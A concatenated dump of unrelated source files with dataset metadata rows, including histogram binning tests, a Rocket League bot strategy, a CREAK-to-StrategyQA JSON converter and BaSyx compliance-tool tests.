assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(bin_size=(2, (1, 2, 3)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 6.0))
assert bins.n_bins == (5, 3)
assert np.array_equal(bins.bin_size[0], 2)
assert np.array_equal(bins.bin_size[1], (1, 2, 3))
assert bins.is_equally_sized == (True, False)
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10)))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(n_bins=(2, 5), bin_range=(0, 10), labels=["position_x", "position_y"])
assert bins.labels == ["position_x", "position_y"]
assert bins.dimension == 2
assert bins.is_equally_sized == (True, True)
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10)), labels=["position_x"])
assert bins.labels == ["position_x"]
assert bins.dimension == 1
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10), labels=["position_x"]))
assert bins.labels == ["position_x"]
assert bins.dimension == 1
with pytest.raises(ValueError):
Bins(n_bins=5, bin_range=(0, 10), labels=["position_x", "position_y"])
def test_Bins_with_boost_histogram():
bhaxis = bh.axis.Regular(5, 0, 10)
bins = Bins(bins=bhaxis)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == ((2, 2, 2, 2, 2),)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
def test_Bins_methods():
bins = Bins(bin_edges=(0, 1, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (3,)
assert np.array_equal(bins.bin_size[0], (1, 1, 2))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 2, 4]))
assert bins.is_equally_sized == (False,)
bins = Bins(bin_edges=(0, 1, 2, 4)).equalize_bin_size()
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (4,)
assert bins.bin_size == (1,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 2, 3, 4]))
assert bins.is_equally_sized == (True,)
def test_histogram(locdata_blobs_2d):
hist = histogram(locdata_blobs_2d, n_bins=10)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 2
assert np.max(hist.data) == 7
hist = histogram(locdata_blobs_2d, n_bins=10, bin_range=((500, 1000), (500, 1000)))
assert hist.data.ndim == 2
assert np.max(hist.data) == 5
assert hist.data.shape == (10, 10)
hist = histogram(locdata_blobs_2d, bin_size=10, loc_properties="position_x")
assert hist.labels == ["position_x", "counts"]
assert hist.data.shape == (89,)
with pytest.raises(ValueError):
histogram(
locdata_blobs_2d,
bin_size=10,
loc_properties="position_x",
bin_range=((500, 1000), (500, 1000)),
)
hist = histogram(locdata_blobs_2d, bin_size=10, loc_properties=["position_x"])
assert hist.labels == ["position_x", "counts"]
assert hist.data.shape == (89,)
hist = histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "position_y"]
)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.shape == (89, 55)
hist = histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "cluster_label"]
)
assert hist.labels == ["position_x", "cluster_label", "counts"]
assert hist.data.shape == (89, 1)
with pytest.raises(ValueError):
histogram(locdata_blobs_2d, bin_size=10, loc_properties="position_z")
with pytest.raises(ValueError):
histogram(locdata_blobs_2d, bin_size=10, loc_properties=["position_z"])
with pytest.raises(ValueError):
histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "position_z"]
)
hist = histogram(
locdata_blobs_2d,
bin_edges=((500, 600, 700, 800, 900, 1000), (500, 600, 700, 800, 900, 1000)),
)
assert hist.data.ndim == 2
assert np.max(hist.data) == 7
hist = histogram(locdata_blobs_2d, bin_size=10, other_property="position_y")
assert hist.labels == ["position_x", "position_y", "position_y"]
assert hist.data.shape == (89, 55)
def test_histogram_1d(locdata_1d):
hist = histogram(locdata_1d, n_bins=10)
assert hist.labels == ["position_x", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 1
assert np.max(hist.data) == 2
assert hist.data.shape == (10,)
hist = histogram(locdata_1d, n_bins=5, bin_range=(5, 10))
assert np.max(hist.data) == 1
assert hist.data.shape == (5,)
hist = histogram(locdata_1d, bin_edges=(5, 6, 7, 8, 9, 10))
assert hist.data.shape == (5,)
hist = histogram(locdata_1d, n_bins=10, other_property="intensity")
assert hist.labels == ["position_x", "intensity"]
assert hist.data.shape == (10,)
assert np.nanmax(hist.data) == 125
def test_histogram_3d(locdata_blobs_3d):
hist = histogram(locdata_blobs_3d, n_bins=10)
assert hist.labels == ["position_x", "position_y", "position_z", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 3
assert np.max(hist.data) == 6
assert hist.data.shape == (10, 10, 10)
hist = histogram(
locdata_blobs_3d, n_bins=10, bin_range=((500, 1000), (500, 1000), (500, 1000))
)
assert np.max(hist.data) == 4
assert hist.data.shape == (10, 10, 10)
hist = histogram(
locdata_blobs_3d,
bin_edges=(
(500, 600, 700, 800, 900, 1000),
(500, 600, 700, 800, 900, 1000),
(500, 600, 700, 800, 900, 1000),
),
)
assert hist.data.shape == (5, 5, 5)
hist = histogram(locdata_blobs_3d, n_bins=10, other_property="position_y")
assert hist.labels == ["position_x", "position_y", "position_z", "position_y"]
assert hist.data.shape == (10, 10, 10)
assert np.nanmax(hist.data) == 787
def test_histogram_empty(locdata_empty):
with pytest.raises(TypeError):
hist = histogram(locdata_empty, n_bins=10)
def test_histogram_single_value(locdata_single_localization_3d):
hist = histogram(locdata_single_localization_3d, n_bins=3)
assert hist.data.shape == (3, 3, 3)
assert np.array_equal(hist.bins.bin_range, [[1, 2], [1, 2], [1, 2]])
hist = histogram(locdata_single_localization_3d, bin_size=0.2)
assert hist.data.shape == (5, 5, 5)
assert np.array_equal(
hist.bins.bin_range,
[[1, pytest.approx(2)], [1, pytest.approx(2)], [1, pytest.approx(2)]],
)
hist = histogram(locdata_single_localization_3d, bin_size=2)
assert hist.data.shape == (1, 1, 1)
assert np.array_equal(hist.bins.bin_range, [[1, 2], [1, 2], [1, 2]])
def test_histogram_2d_negative_values(locdata_2d_negative):
hist = histogram(locdata_2d_negative, n_bins=10)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.shape == (10, 10)
| 37.226343 | 87 | 0.619766 | 4,814 | 29,111 | 3.489821 | 0.028251 | 0.074167 | 0.069643 | 0.096429 | 0.915298 | 0.874881 | 0.842798 | 0.79375 | 0.752024 | 0.702083 | 0 | 0.081037 | 0.200955 | 29,111 | 781 | 88 | 37.274008 | 0.641202 | 0 | 0 | 0.447167 | 0 | 0 | 0.044107 | 0 | 0 | 0 | 0 | 0 | 0.445636 | 1 | 0.042879 | false | 0 | 0.007657 | 0 | 0.050536 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
395096e5187ec5fb3359421a8017c93ceccd8139 | 17,556 | py | Python | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | from gettext import find
from tools import *
from objects import *
from routines import *
from threading import local
from utils import *
import time
from tools import *
from rlbot.agents.base_agent import BaseAgent, SimpleControllerState
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
#This file is for strategy
class omen(GoslingAgent):
def run(agent):
if len(agent.friends) == 0:
if agent.team > 0.1:
team_multiplier = 1
if agent.team < 0.1:
team_multiplier = -1
if agent.team == 0:
team_lol = 0
else:
team_lol = 1
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
future_ball = Vec3(0, 0, 0)
future_ball_2 = 0
ball_in_future = 0
ball_in_future_2 = 0
packet = GameTickPacket()
ball_prediction = agent.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, agent.time + 1)
ball_in_future_2 = find_slice_at_time(ball_prediction, agent.time + 2)
if ball_in_future is not None:
future_ball = Vec3(ball_in_future.physics.location)
elif ball_in_future_2 is not None:
future_ball = Vec3(ball_in_future_2.physics.location)
my_goal_to_ball,my_ball_distance = (agent.ball.location - agent.friend_goal.location).normalize(True)
goal_to_me = agent.me.location - agent.friend_goal.location
my_distance = my_goal_to_ball.dot(goal_to_me)
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
foe_goal_to_ball,foe_ball_distance = (agent.ball.location - agent.foe_goal.location).normalize(True)
foe_goal_to_foe = agent.foes[0].location - agent.foe_goal.location
foe_distance = foe_goal_to_ball.dot(foe_goal_to_foe)
closest_foe_to_ball = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.ball.location).magnitude() > (foe.location - agent.ball.location).magnitude():
closest_foe = foe
left_field = Vector3(4200*-side(agent.team),agent.ball.location.y + (1000*-side(agent.team)),0)
right_field = Vector3(4200*side(agent.team),agent.ball.location.y + (1000*side(agent.team)),0)
targets = {"goal": (agent.foe_goal.left_post, agent.foe_goal.right_post),
"upfield": (left_field, right_field),
"not_my_net": (agent.friend_goal.right_post, agent.friend_goal.left_post)}
shots = find_hits(agent, targets)
x = 1
me_onside = my_distance - 200 < my_ball_distance
foe_onside = foe_distance - 200 < foe_ball_distance
close = (agent.me.location - agent.ball.location).magnitude() < 3000
foe_close = (closest_foe_to_ball.location - agent.ball.location).magnitude() < 3000
have_boost = agent.me.boost > 20
defense_location = Vector3(agent.ball.location.x, agent.ball.location.y + (4000 * team_multiplier), 0)
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe.location - agent.me.location).magnitude() > (foe.location - agent.me.location).magnitude():
closest_foe = foe
x = 1
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255,255,255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0,255,0])
def get_closest_boost(agent):
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
def demo(agent):
relative_target = closest_foe.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
if (agent.me.location - closest_foe.location).magnitude() < 200:
agent.push(flip(agent.me.local(closest_foe.location - agent.me.location)))
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255,255,255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0,255,0])
if agent.team == 0:
agent.debug_stack()
if len(agent.stack) < 1:
if agent.kickoff_flag:
if agent.me.location.x > 300 or agent.me.location.x < -300:
agent.push(kickoff())
else:
agent.controller.throttle = 0
elif (agent.me.location - agent.friend_goal.location).magnitude() < 2000 and -1000 < agent.ball.location.x < 1000 and -1000 < closest_foe_to_ball.location.x < 1000:
if len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
elif (close and me_onside) and (foe_onside and foe_close) and (agent.me.location - agent.ball.location).magnitude() > 50 and agent.ball.location.z < 200:
while (agent.me.location - agent.ball.location).magnitude() > 50:
relative_target = agent.ball.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
break
elif (close and me_onside) or me_onside and (closest_foe_to_ball.location - agent.ball.location).magnitude() > (agent.me.location - agent.ball.location).magnitude():
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
elif len(shots["upfield"]) > 0:
agent.push(shots["upfield"][0])
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 6000:
agent.push(goto(defense_location))
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 4000 and (closest_foe.location - agent.ball.location).magnitude() > 3000 and agent.me.boost < 30 or (agent.ball.location - agent.friend_goal.location).magnitude() > 8000 and agent.me.boost < 30:
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
elif (agent.ball.location - agent.friend_goal.location).magnitude() < 5000 and len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
else:
demo(agent)
elif len(agent.friends) > 0:
if agent.team > 0.1:
team_multiplier = 1
if agent.team < 0.1:
team_multiplier = -1
if agent.team == 0:
team_lol = 0
else:
team_lol = 1
if len(agent.friends) > 0:
for friend in agent.friends:
if (agent.me.location - agent.ball.location).magnitude() > (friend.location - agent.ball.location).magnitude():
is_closest_friend_to_ball = False
else:
is_closest_friend_to_ball = True
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe.location - agent.me.location).magnitude() > (foe.location - agent.me.location).magnitude():
closest_foe = foe
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
future_ball = Vec3(0, 0, 0)
future_ball_2 = 0
ball_in_future = 0
ball_in_future_2 = 0
packet = GameTickPacket()
ball_prediction = agent.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, agent.time + 1)
ball_in_future_2 = find_slice_at_time(ball_prediction, agent.time + 2)
if ball_in_future is not None:
future_ball = Vec3(ball_in_future.physics.location)
elif ball_in_future_2 is not None:
future_ball = Vec3(ball_in_future_2.physics.location)
my_goal_to_ball, my_ball_distance = (agent.ball.location - agent.friend_goal.location).normalize(True)
goal_to_me = agent.me.location - agent.friend_goal.location
my_distance = my_goal_to_ball.dot(goal_to_me)
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
foe_goal_to_ball, foe_ball_distance = (agent.ball.location - agent.foe_goal.location).normalize(True)
foe_goal_to_foe = agent.foes[0].location - agent.foe_goal.location
foe_distance = foe_goal_to_ball.dot(foe_goal_to_foe)
closest_foe_to_ball = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.ball.location).magnitude() > (
foe.location - agent.ball.location).magnitude():
closest_foe_to_ball = foe
if len(agent.friends) > 0:
closest_friend_to_ball = agent.friends[0]
for friend in agent.friends:
if (closest_friend_to_ball.location - agent.ball.location).magnitude() > (
friend.location - agent.ball.location).magnitude():
closest_friend_to_ball = friend
closest_friend_to_goal = agent.friends[0]
for friend in agent.friends:
if (closest_friend_to_goal.location - agent.friend_goal.location).magnitude() > (
friend.location - agent.friend_goal.location).magnitude():
closest_friend_to_goal = friend
closest_friend = agent.friends[0]
for friend in agent.friends:
if (closest_friend.location - agent.me.location).magnitude() > (
friend.location - agent.me.location).magnitude():
closest_friend = friend
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.me.location).magnitude() > (
foe.location - agent.me.location).magnitude():
closest_foe = foe
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
targets = {"goal": (agent.foe_goal.left_post, agent.foe_goal.right_post),
"upfield": (left_field, right_field),
"not_my_net": (agent.friend_goal.right_post, agent.friend_goal.left_post)}
shots = find_hits(agent, targets)
x = 1
me_onside = my_distance - 200 < my_ball_distance
foe_onside = foe_distance - 200 < foe_ball_distance
close = (agent.me.location - agent.ball.location).magnitude() < 3000
foe_close = (closest_foe_to_ball.location - agent.ball.location).magnitude() < 3000
have_boost = agent.me.boost > 20
defense_location = Vector3(agent.ball.location.x, agent.ball.location.y + (4000 * team_multiplier), 0)
x = 1
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255, 255, 255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0, 255, 0])
def get_closest_boost(agent):
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
def demo(agent):
relative_target = closest_foe.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
if (agent.me.location - closest_foe.location).magnitude() < 200:
agent.push(flip(agent.me.local(closest_foe.location - agent.me.location)))
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255, 255, 255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0, 255, 0])
if agent.team == 0:
agent.debug_stack()
if len(agent.stack) < 1:
if agent.kickoff_flag:
if (closest_friend_to_ball.location - agent.ball.location).magnitude() > (agent.me.location - agent.ball.location).magnitude() or (closest_friend_to_ball.location - agent.ball.location).magnitude() == (agent.me.location - agent.ball.location).magnitude() and closest_friend_to_ball.location.x < agent.me.location.x:
agent.push(kickoff())
else:
get_closest_boost(agent)
elif (close and me_onside) and (foe_onside and foe_close) and (
agent.me.location - agent.ball.location).magnitude() > 50 and agent.ball.location.z < 200 and (closest_friend_to_ball.location - agent.ball.location).magnitude() > 1000:
while (agent.me.location - agent.ball.location).magnitude() > 50:
relative_target = agent.ball.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
break
elif (close and me_onside) or (not foe_onside and me_onside) or (agent.me.location - agent.ball.location).magnitude() < (closest_friend_to_ball.location - agent.ball.location).magnitude() and me_onside:
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
elif len(shots["upfield"]) > 0:
agent.push(shots["upfield"][0])
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 4000 and (
closest_foe.location - agent.ball.location).magnitude() > 3000 and agent.me.boost < 30 or (
agent.ball.location - agent.friend_goal.location).magnitude() > 8000 and agent.me.boost < 30:
get_closest_boost(agent)
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 5000 and (closest_friend_to_ball.location - agent.ball.location).magnitude() < (agent.me.location - agent.ball.location).magnitude():
demo(agent)
elif (agent.ball.location.y - agent.friend_goal.location.y) > 4000:
agent.push(goto(defense_location))
elif (agent.ball.location - agent.friend_goal.location).magnitude() < 4000 and len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
else:
demo(agent)
| 53.039275 | 335 | 0.582308 | 2,105 | 17,556 | 4.647031 | 0.067933 | 0.094459 | 0.109487 | 0.084339 | 0.908812 | 0.886731 | 0.866387 | 0.861071 | 0.861071 | 0.845328 | 0 | 0.036668 | 0.314935 | 17,556 | 330 | 336 | 53.2 | 0.776669 | 0.001424 | 0 | 0.786765 | 0 | 0 | 0.008329 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018382 | false | 0 | 0.058824 | 0 | 0.080882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ab689a434c0a2be1718478c74519e57e2a34182 | 186 | py | Python | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | 2 | 2019-08-01T15:08:25.000Z | 2021-01-30T07:29:34.000Z | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | null | null | null | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | null | null | null | from .mWindowsConstants.dsHResultDefineName_by_uValue import dsHResultDefineName_by_uValue;
def fs0GetHResultDefineName(uHResult):
return dsHResultDefineName_by_uValue.get(uHResult);
| 37.2 | 91 | 0.887097 | 18 | 186 | 8.833333 | 0.611111 | 0.396226 | 0.509434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 0.05914 | 186 | 4 | 92 | 46.5 | 0.902857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
46f3be5bc8c1602bbcf543437ad01f991de45a03 | 197 | py | Python | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | null | null | null | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | 28 | 2016-11-30T03:15:18.000Z | 2022-02-25T15:57:02.000Z | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | 1 | 2021-11-10T05:33:18.000Z | 2021-11-10T05:33:18.000Z | from __future__ import absolute_import
from tests.all_warnings import AllWarnings
from tests.document import *
from tests.queryset import *
from tests.fields import *
from tests.migration import *
| 28.142857 | 42 | 0.832487 | 27 | 197 | 5.851852 | 0.444444 | 0.28481 | 0.379747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121827 | 197 | 6 | 43 | 32.833333 | 0.913295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
649e1ad64ebcb40ba329809013e4004161f0652b | 2,211 | py | Python | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | import json
import sys
json_file = open(sys.argv[1])
creak_lines = json_file.readlines()
out_file = sys.argv[2]
#data = json.load(json_file)
with open(out_file, "w") as outfile:
outfile.write('[\n')
for i in range(len(creak_lines) - 2):
example = creak_lines[i]
outfile.write('\t{\n')
data = json.loads(example)
uid = data['ex_id']
entity = data['entity']
sentence = data['sentence']
label = data['label']
desc = ""
if '(' in entity and ')' in entity:
desc = entity.split('(')[1].split(')')[0]
entity = entity.split(' (')[0]
id_line = "\t\t\"qid\": \"{}\",\n".format(uid)
term_line = "\t\t\"term\": \"{}\",\n".format(entity)
description_line = "\t\t\"description\": \"{}\",\n".format(desc)
question_line = "\t\t\"question\": \"{}\",\n".format(sentence)
answer_line = "\t\t\"answer\": {},\n".format(label)
fact_line = "\t\t\"facts\": [],\n"
decomp_line = "\t\t\"decomposition\": [],\n"
evidence_line = "\t\t\"evidence\": []\n"
outfile.write(id_line)
outfile.write(term_line)
outfile.write(description_line)
outfile.write(question_line)
outfile.write(answer_line)
outfile.write(fact_line)
outfile.write(decomp_line)
outfile.write(evidence_line)
outfile.write('\t},\n')
example = creak_lines[-2]
outfile.write('\t{\n')
data = json.loads(example)
uid = data['ex_id']
entity = data['entity']
sentence = data['sentence']
label = data['label']
desc = ""
if '(' in entity and ')' in entity:
desc = entity.split('(')[1].split(')')[0]
entity = entity.split(' (')[0]
id_line = "\t\t\"qid\": \"{}\",\n".format(uid)
term_line = "\t\t\"term\": \"{}\",\n".format(entity)
description_line = "\t\t\"description\": \"{}\",\n".format(desc)
question_line = "\t\t\"question\": \"{}\",\n".format(sentence)
answer_line = "\t\t\"answer\": {},\n".format(label)
fact_line = "\t\t\"facts\": [],\n"
decomp_line = "\t\t\"decomposition\": [],\n"
evidence_line = "\t\t\"evidence\": []\n"
outfile.write(id_line)
outfile.write(term_line)
outfile.write(description_line)
outfile.write(question_line)
outfile.write(answer_line)
outfile.write(fact_line)
outfile.write(decomp_line)
outfile.write(evidence_line)
outfile.write('\t}\n')
outfile.write(']\n') | 32.043478 | 66 | 0.631389 | 318 | 2,211 | 4.254717 | 0.160377 | 0.195122 | 0.070953 | 0.04139 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0 | 0.005173 | 0.125735 | 2,211 | 69 | 67 | 32.043478 | 0.694775 | 0.012212 | 0 | 0.8 | 0 | 0 | 0.123626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
649fc46b3782e29accaa8dc7d7945204f27eeded | 9,989 | py | Python | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 4 | 2022-01-07T01:30:49.000Z | 2022-02-21T07:58:14.000Z | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 5 | 2022-02-22T15:24:22.000Z | 2022-03-28T11:42:28.000Z | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 2 | 2021-11-15T10:24:02.000Z | 2022-03-17T14:44:39.000Z | # Copyright (c) 2020 the Eclipse BaSyx Authors
#
# This program and the accompanying materials are made available under the terms of the MIT License, available in
# the LICENSE file of this project.
#
# SPDX-License-Identifier: MIT
import os
import unittest
import basyx.aas.compliance_tool.compliance_check_xml as compliance_tool
from basyx.aas.compliance_tool.state_manager import ComplianceToolStateManager, Status
class ComplianceToolXmlTest(unittest.TestCase):
def test_check_schema(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_found.xml')
compliance_tool.check_schema(file_path_1, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.FAILED, manager.steps[0].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[1].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[2].status)
self.assertIn("No such file or directory", manager.format_step(0, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_missing_submodels.xml')
compliance_tool.check_schema(file_path_3, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_schema(file_path_4, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_5 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_schema(file_path_5, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
